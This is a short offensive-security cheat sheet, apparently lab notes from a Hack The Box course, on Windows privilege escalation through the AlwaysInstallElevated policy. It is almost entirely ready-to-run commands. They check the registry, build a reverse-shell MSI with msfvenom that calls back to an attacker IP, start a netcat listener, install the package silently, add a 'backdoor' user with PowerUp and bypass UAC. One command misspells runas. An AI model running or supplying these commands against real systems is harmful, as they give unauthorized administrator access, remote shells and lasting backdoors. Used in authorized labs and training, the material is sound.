always-installed-elevated

Enum `always install elevated` settings

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If the output is 0x1, we can continue (exploit).

Exploit (if it is enabled)

Generate MSI package

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

Execute MSI package

nc -lnvp 9443

msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Check PowerUp uses privileges

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Import-Module .\PowerUp.ps1

Write-UserAddMSI

.\UserAdd.msi           #Execute .msi

Create a new user

runsas /user:backdoor cmd

Bypassing UAC

Import-Module .\Bypass-UAC.ps1

Bypass-UAC -Method UacMethodSysprep

Last updated 2 days ago